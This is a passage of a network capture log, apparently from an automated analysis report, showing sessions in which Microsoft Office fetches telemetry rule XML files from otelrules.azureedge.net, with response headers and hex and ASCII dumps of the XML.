                                                                                                                          2024-10-13 16:21:51 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          128192.168.2.44989313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:51 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:51 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:51 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1403
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                          ETag: "0x8DC582BDC2EEE03"
                                                                                                                          x-ms-request-id: 6411c5a0-901e-0083-0ae3-1abb55000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162151Z-17db6f7c8cf5mtxmr1c51513n0000000059000000000ccmt
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:51 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          129192.168.2.44989413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:51 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:52 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:51 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1366
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                          ETag: "0x8DC582BEA414B16"
                                                                                                                          x-ms-request-id: df344972-701e-001e-12cd-1af5e6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162151Z-17db6f7c8cfhzb2znbk0zyvf6n00000004r000000000ecyf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:52 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          130192.168.2.44989513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:51 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:52 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:51 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1399
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                          ETag: "0x8DC582BE1CC18CD"
                                                                                                                          x-ms-request-id: 51572f68-f01e-003c-100e-1c8cf0000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162151Z-17db6f7c8cfcl4jvqfdxaxz9w800000002mg0000000031gm
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:52 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          131192.168.2.44989613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:52 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:52 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:52 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1362
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                          ETag: "0x8DC582BEB256F43"
                                                                                                                          x-ms-request-id: 0c263a70-701e-0098-1b5d-1c395f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162152Z-17db6f7c8cfmhggkx889x958tc000000028000000000ckz4
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:52 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          132192.168.2.44989713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:52 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:52 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:52 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1403
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                          ETag: "0x8DC582BEB866CDB"
                                                                                                                          x-ms-request-id: 0506fa48-b01e-001e-4cc1-1a0214000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162152Z-17db6f7c8cf4g2pjavqhm24vp400000005c0000000005z9u
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          133192.168.2.44989813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:52 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:52 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:52 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1366
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                          ETag: "0x8DC582BE5B7B174"
                                                                                                                          x-ms-request-id: 03a639d1-101e-008d-40f2-1a92e5000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162152Z-17db6f7c8cfvzwz27u5rnq9kpc00000005hg0000000011yx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:52 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          134192.168.2.44989913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:52 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:52 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:52 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1399
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                          ETag: "0x8DC582BE976026E"
                                                                                                                          x-ms-request-id: f0362bac-601e-005c-101b-1cf06f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162152Z-17db6f7c8cfvq8pt2ak3arkg6n000000034g000000006ww2
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:52 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          135192.168.2.44990013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:52 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:52 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:52 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1362
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                          ETag: "0x8DC582BDC13EFEF"
                                                                                                                          x-ms-request-id: 583c5f3b-101e-007a-5257-1c047e000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162152Z-17db6f7c8cf9c22xp43k2gbqvn00000002r000000000b1pn
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:52 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          136192.168.2.44990113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:53 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:53 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:53 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1425
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                          ETag: "0x8DC582BE6BD89A1"
                                                                                                                          x-ms-request-id: 08565fb3-401e-0029-27c4-1a9b43000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162153Z-17db6f7c8cfp6mfve0htepzbps00000004n0000000002y67
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:53 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          137192.168.2.44990213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:53 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:53 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:53 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1388
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
